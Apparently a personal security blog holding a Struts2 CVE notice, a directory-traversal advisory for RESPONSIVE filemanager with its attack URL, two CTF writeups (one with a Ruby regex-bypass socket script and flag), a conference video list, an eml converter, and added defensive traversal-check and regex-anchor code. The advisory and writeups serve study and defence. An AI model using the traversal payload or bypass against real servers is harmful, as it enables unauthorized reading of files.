Tuesday, 7 March 2017

Apache Struts2 (CVE-2017-5638)

Be careful: there is a new vulnerability in Apache Struts2 (CVE-2017-5638).

How to fix: upgrade to Struts 2.3.32 or Struts 2.5.10.1
Affected versions: Struts 2.3.5 - 2.3.31, Struts 2.5 - 2.5.10


POC:
https://github.com/tengzhangchao/Struts2_045-Poc 

Thursday, 9 June 2016

RESPONSIVE filemanager <= 9.10.2 - Directory Traversal

Advisory: Directory Traversal in RESPONSIVE filemanager on Windows Server

During a penetration test, a directory traversal vulnerability was discovered
in RESPONSIVE filemanager. Attackers are able to read arbitrary directories by specifying a
relative path.

Details
=======

Product: RESPONSIVE filemanager
Affected Versions: RESPONSIVE filemanager v9.10.2
Fixed Versions: Not yet
Vulnerability Type: Directory Traversal
Vendor URL:
    http://www.responsivefilemanager.com/
Software Link:
    https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.10.2/responsive_filemanager.zip
Vendor Status: fixed version released
Advisory URL: http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
Tested on: Windows Server
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575

Attack Detail
=============
[URL]/filemanager/dialog.php?editor=tinymce&type=&lang=&popup=0&field_id=&relative_url=0&akey=key&fldr=..\
fldr=..\..\..\
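As an added defensive example (not part of the advisory): a path-resolution check that refuses the backslash traversal shown above, and a scan of access-log lines for the same pattern in the fldr parameter. The base directory and the log lines are constructed assumptions, not the product's real layout or logs.

```python
import os
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Sequences that signal traversal in a 'fldr' value: plain, URL-encoded, double-encoded.
TRAVERSAL_RE = re.compile(r"\.\.[\\/]|\.\.%5c|\.\.%2f|%2e%2e", re.IGNORECASE)


def resolve_fldr(base_dir: str, fldr: str):
    """Map a user-supplied 'fldr' value onto a directory below base_dir.

    Returns the normalised absolute path, or None when the value would leave
    base_dir. Backslashes are treated as separators because Windows accepts
    them even though the application only expects '/'.
    """
    rel = unquote(fldr).replace("\\", "/")
    if posixpath.isabs(rel) or re.match(r"[A-Za-z]:", rel):
        return None                       # absolute path or drive letter
    base = os.path.normpath(base_dir)
    target = os.path.normpath(os.path.join(base, rel))
    if os.path.commonpath([base, target]) != base:
        return None                       # '..' climbed above base_dir
    return target


def flag_traversal_requests(log_lines):
    """Return (line_no, fldr) for access-log lines whose dialog.php request
    carries a 'fldr' value containing a traversal sequence."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"GET (\S+) HTTP', line)
        if not m or "dialog.php" not in m.group(1):
            continue
        for fldr in parse_qs(urlsplit(m.group(1)).query).get("fldr", []):
            if TRAVERSAL_RE.search(fldr) or TRAVERSAL_RE.search(unquote(fldr)):
                hits.append((n, fldr))
    return hits


# Constructed sample log lines (not from the page): one benign, two traversal attempts.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jun/2016:10:00:01 +0000] "GET /filemanager/dialog.php?type=0&fldr=images HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Jun/2016:10:00:07 +0000] "GET /filemanager/dialog.php?type=0&fldr=..%5C..%5C..%5C HTTP/1.1" 200 9001',
    '10.0.0.9 - - [09/Jun/2016:10:00:09 +0000] "GET /filemanager/dialog.php?type=0&fldr=..\\..\\ HTTP/1.1" 200 8800',
]
```

Calling resolve_fldr on a flagged value returns None, which is the point: the same check that refuses the request at serving time also classifies the log entry afterwards.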

Monday, 14 March 2016

CODEGATE 2016: JS_is_not_a_jail

JS_is_not_a_jail
nc 175.119.158.131 1129

After connecting to the server, I tried the "quit()" command.
It raised an error containing the file path "/home/codegate/cg.js".

I can use the read() feature to read the code.

read('/home/codegate/cg.js')


FLAG:
easy xD, get a more hardest challenge!


Monday, 22 February 2016

Internetwache 2016 EXP50 Writeup



When I accessed the server at 188.166.133.53:12037,
it showed "Let me count the ascii values of 10 characters:".
I just input some text such as "test"; then it showed an error as below:
"WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !"

Ruby has a regex vulnerability. I wrote code to get the flag.

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('188.166.133.53', 12037))

# Banner and prompt (sockets carry bytes in Python 3, so decode before printing).
print(s.recv(1024).decode())
print(s.recv(1024).decode())
# Ruby's ^ and $ are line anchors, so the second line of ten [a-f] characters
# satisfies /^[a-f]{10}$/ even though the input as a whole does not.
s.send(b'ls\naaaaaaaaaa')
print(s.recv(1024).decode())
s.close()

Then, the server returns as below:

$ python test.py
Let me count the ascii values of 10 characters:


Sum is: 1203
IW{RUBY_R3G3X_F41L}


FLAG:
IW{RUBY_R3G3X_F41L}

Reference:
http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html
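An added example (not the challenge's code) showing the anchor mistake behind the writeup next to its hardened form. Ruby's ^ and $ are always line anchors; Python only behaves that way under re.MULTILINE, which is used here purely to emulate the Ruby check, and the ASCII sum reproduces the "Sum is: 1203" line from the server output.

```python
import re

# Emulation of the challenge's Ruby check /^[a-f]{10}$/: with re.MULTILINE,
# ^ and $ match at every line boundary, as they always do in Ruby.
LINE_ANCHORED = re.compile(r"^[a-f]{10}$", re.MULTILINE)

# Python's default $ still matches before one trailing newline, so "^...$"
# is not a whole-string check in Python either.
DEFAULT_ANCHORED = re.compile(r"^[a-f]{10}$")

# Hardened form: \A and \Z bind to the whole string (Ruby spells them \A and \z).
STRING_ANCHORED = re.compile(r"\A[a-f]{10}\Z")


def passes_ruby_style_check(data: str) -> bool:
    """True if any single line is ten [a-f] characters (the vulnerable check)."""
    return LINE_ANCHORED.search(data) is not None


def passes_python_default_check(data: str) -> bool:
    """True for ten [a-f] characters optionally followed by one newline."""
    return DEFAULT_ANCHORED.search(data) is not None


def passes_fixed_check(data: str) -> bool:
    """True only if the entire input is exactly ten [a-f] characters."""
    return STRING_ANCHORED.search(data) is not None


def ascii_sum(data: str) -> int:
    """The challenge's 'Sum is:' figure: every byte counts, newline included."""
    return sum(data.encode("ascii"))


PAYLOAD = "ls\naaaaaaaaaa"   # the writeup's input: a first line, then ten 'a's
```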

Wednesday, 13 January 2016

List of all the security conferences in 2015 (or older)

Reference: https://www.reddit.com/r/netsec/comments/40i06f/i_put_together_a_list_of_all_the_security/

1. Security Conferences from 2015
https://www.tunnelsup.com/online-security-conferences/

2. NorthSec, Montreal, Canada
https://www.youtube.com/playlist?list=PLuUtcRxSUZUpQAa54H6PKkfX6A48ruzhh

3. 32C3
https://www.youtube.com/playlist?list=PL_IxoDz1Nq2YahR4DU9q5GWsSTle-mETW

4. PS4 Booting and running Linux
https://www.youtube.com/watch?v=PQFNnr6Ly9M

5. Metcalf - Modern Active Directory Attacks (Blackhat usa 2015)
https://www.youtube.com/watch?v=b6GUXerE9Ac&list=PLH15HpR5qRsXF78lrpWP2JKpPJs_AFnD7&index=42

6. Rob Fuller - Basic Security
https://www.youtube.com/watch?v=TqbGNFfl1d8

7. SteelCon (Sheffield, UK, July 3-5 2015)
https://www.youtube.com/playlist?list=PLmfJypsykTLX9mDeChQ7fovybwYzQgr6j

8. ekoparty 2015
https://vimeo.com/album/3682874

9. OWASP AppSec EU and CA
https://www.youtube.com/playlist?list=PLpr-xdpM8wG93dG_L9QKs0W1cD-esQEzU

10. Crypto 2015
https://m.youtube.com/playlist?list=PLeeS-3Ml-rpoNWewUnljPP7QN4USn4c7H
http://www.iacr.org/conferences/crypto2015/

11. BSides Orlando (April 11-12, 2015)
https://www.youtube.com/playlist?list=PLu1bAtIWt2VbXiy4kNWdtVkWiRWvPoeD6

12. BruCON as well (26-27 October)
https://www.youtube.com/user/brucontalks

13. USENIX Security '15
https://www.youtube.com/playlist?list=PLbRoZ5Rrl5lfeRixThHzgGYj1wu80JOh3

14. Brucon (Belgium)
https://www.youtube.com/playlist?list=PLtb1FJdVWjUfZ9fWxPPCrOO7LUquB3WrB

15. CERT.pl's Secure 2015
https://www.youtube.com/playlist?list=PLghf5UNZbzG0zLarfwpw4PxPTS0IWo8vB

16. CornCon
https://www.youtube.com/channel/UCP2fm3Wg8LacmD96N7CkOBA/videos?sort=dd&view=0&shelf_id=0

17. BSides Charleston
https://www.youtube.com/user/bsideschs/videos

18. SaintCON 2015 at Weber State University in Ogden UT
https://www.youtube.com/channel/UCEiHGeWgdIoLCzTLm_izCoQ

19. BSidesSLC that will be in Salt Lake City 2016
https://www.youtube.com/channel/UCuJ0qrx-oNq2hxrUX5IYd9A

20. syscan
https://www.youtube.com/channel/UCx5hZiie0VzFvV-u376v7DQ

21. Brocon 2015
https://www.youtube.com/playlist?list=PL2EYTX8UVCMhwxWH1IklKkV64YX_0Xcoo

22. CarolinaCon
https://www.youtube.com/user/CarolinaConVideos/videos

23. Bsides Lisbon 2015
https://www.youtube.com/channel/UC_M0dk4dvcBr_rFgi710D4Q

Wednesday, 26 August 2015

Python EML file viewer (simple version)

Sometimes, employees pass eml files to me for reference, etc.
Unfortunately, I don't have an eml viewer....

So I simply coded a converter from eml to html, only for plain/text that is in base64.
When I searched for a python module for an eml converter, I found the "email" module.
But I need only a simple version. :)

I hope it helps your work. :)



import re, base64

filename = "./1.eml"

# Collect the base64 body of the first part whose headers announce
# "Content-Transfer-Encoding: base64". Header lines are scanned up to the
# blank line that ends them, so the encoding header may sit anywhere in the part.
S = ""
with open(filename, "r") as f:
    lines = f.read().splitlines()

i = 0
while i < len(lines):
    if re.match("Content-Type: ", lines[i]):
        is_base64 = False
        while i < len(lines) and lines[i] != "":
            if re.match("Content-Transfer-Encoding: base64", lines[i]):
                is_base64 = True
            i += 1
        i += 1                      # skip the blank line before the body
        if is_base64:
            # The body runs until the next blank line or a MIME boundary line.
            while i < len(lines) and lines[i] != "" and not lines[i].startswith("--"):
                S += lines[i]
                i += 1
            break
    i += 1

with open(filename + "_convert.html", "w", encoding="utf-8") as con_f:
    con_f.write("<b>CONVERT: ONLY PLAIN/TEXT</b><br /><br />\n")
    # b64decode returns bytes in Python 3; decode them before writing text.
    con_f.write(base64.b64decode(S).decode("utf-8", errors="replace"))
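An added example (not the author's script) using the "email" module the post mentions, run over a constructed message rather than a real eml file: it decodes every text/plain part whatever its transfer encoding or charset, and HTML-escapes the body so that markup or script inside a mail cannot render as live HTML when the converted file is opened in a browser.

```python
import base64
import html
from email import policy
from email.parser import BytesParser

# Constructed sample message (not from the page). The body is the base64 of
# "Hello <b>world</b>\n", so the decoded text contains HTML-looking markup.
SAMPLE_EML = (
    b"From: alice@example.test\r\n"
    b"To: bob@example.test\r\n"
    b"Subject: test <script>\r\n"
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: text/plain; charset="utf-8"\r\n'
    b"Content-Transfer-Encoding: base64\r\n"
    b"\r\n" + base64.b64encode(b"Hello <b>world</b>\n") + b"\r\n"
)


def plain_text_parts(raw: bytes):
    """Yield the decoded text of every text/plain part; the email module
    handles base64/quoted-printable and the declared charset."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            yield part.get_content()


def eml_to_html(raw: bytes) -> str:
    """Render the message as HTML. Subject and body are escaped so mail
    content is displayed as text, never interpreted as markup or script."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    subject = html.escape(msg.get("Subject", ""))
    body = "<hr />\n".join(
        f"<pre>{html.escape(text)}</pre>" for text in plain_text_parts(raw)
    )
    return (
        "<b>CONVERT: ONLY TEXT/PLAIN</b><br />"
        f"<b>Subject:</b> {subject}<br /><br />\n{body}\n"
    )
```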